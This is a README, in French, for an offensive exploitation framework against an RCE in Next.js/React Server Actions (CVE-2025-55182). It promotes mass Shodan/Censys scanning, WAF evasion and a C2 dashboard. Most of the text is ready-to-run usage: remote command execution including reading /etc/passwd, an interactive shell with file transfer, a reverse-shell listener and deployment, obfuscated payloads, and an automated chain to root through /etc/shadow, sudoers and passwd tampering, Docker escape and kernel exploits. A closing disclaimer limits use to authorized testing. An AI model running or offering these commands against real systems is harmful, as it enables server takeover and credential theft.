
Kit d'exploitation élite pour CVE-2025-55182 (RCE des composants serveur React). Charges utiles polymorphes asynchrones, contournement avancé WAF/CDN, rotation de proxy, scan de masse Shodan/Censys, auto-pwn + shells inversés, modèles Nuclei, lab K8s et tableau de bord C2. Auteur : Sudeepa Wanigarathna – strictement réservé aux équipes rouges autorisées et aux tests d'intrusion.
██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██╗
██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║ ██║
██║ █████╗ ██████╔╝██████╔╝█████╗ ██████╔╝██║ ██║
██║ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██╔══██╗██║ ██║
╚██████╗ ███████╗██║ ██║██████╔╝███████╗██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝
Framework d'Exploitation React2Shell v1.0
Auteur : Sudeepa Wanigarathna
Framework d'exploitation de qualité professionnelle pour la vulnérabilité d'exécution de code à distance (RCE) dans les Server Actions de Next.js (React2Shell). Démontre la chaîne d'attaque complète, de l'accès initial à l'escalade de privilèges root.
Capacités :
# Vérifier la vulnérabilité
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Exécuter une commande
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"
python3 interactive_shell.py --target http://127.0.0.1:3000
# Exploitation complète : RCE → Énumération → Accès root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py # Moteur d'exploitation principal (400+ lignes)
├── demo_exploit.py # Chaîne d'attaque automatisée (290+ lignes)
├── interactive_shell.py # Shell interactif (280+ lignes)
├── reverse_shell_handler.py # Écouteur de reverse shell (180+ lignes)
├── post_exploit/
│ ├── linux_enum.py # Énumération système (330+ lignes)
│ ├── priv_esc.py # Escalade de privilèges (320+ lignes)
│ └── __init__.py
├── EXPLOITATION_GUIDE.md # Documentation d'utilisation complète
├── QUICKSTART.md # Référence rapide
└── BANNER.txt
# Vérification de vulnérabilité
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Exécuter des commandes
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"
# Variantes de charges utiles
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn
# Avec obfuscation
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate
# Lancer le shell
python3 interactive_shell.py --target http://127.0.0.1:3000
# Commandes disponibles :
# - execute <cmd> : Exécuter une commande shell
# - enum : Lancer l'énumération complète
# - escalate : Tenter l'escalade de privilèges
# - upload <local> <remote> : Uploader un fichier
# - download <remote> <local>: Downloader un fichier
# - shell <lhost> <lport>: Déployer un reverse shell
# - info : Afficher les informations de session
# - exit : Quitter
# Terminal 1 : Démarrer l'écouteur
python3 reverse_shell_handler.py --lport 4444
# Terminal 2 : Déployer le shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
--revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash
# Chaîne complète : Découverte → RCE → Énum → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Le framework met en œuvre une chaîne d'exploitation complète en 6 étapes :
id/etc/shadow et en listant /rootBinaires SUID (GTFOBins)
Fichiers /etc inscriptibles
/etc/passwd - Ajouter un nouvel utilisateur root/etc/shadow - Effacer le mot de passe root/etc/sudoers - Accorder sudo sans mot de passe (NOPASSWD)Échappement Docker
Exploits du noyau
Capacités Linux
pip install -r requirements.txt
Dépendances :
EXPLOITATION_GUIDE.md - Guide d'utilisation complet avec exemplesQUICKSTART.md - Référence rapide pour les commandes courantesATTENTION : Cet outil est destiné uniquement aux tests de sécurité autorisés. L'accès non autorisé à des systèmes informatiques est illégal. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de test.
L'auteur n'est pas responsable de toute utilisation abusive de cet outil. Utilisez-le à vos propres risques.
Ce framework est conçu pour :
Licence MIT (À des fins éducatives uniquement)
Sudeepa Wanigarathna
Version : 1.0 Dernière mise à jour : Décembre 2025 Statut du laboratoire : http://127.0.0.1:3000 (En cours d'exécution)
Pour des instructions d'utilisation détaillées, voir EXPLOITATION_GUIDE.md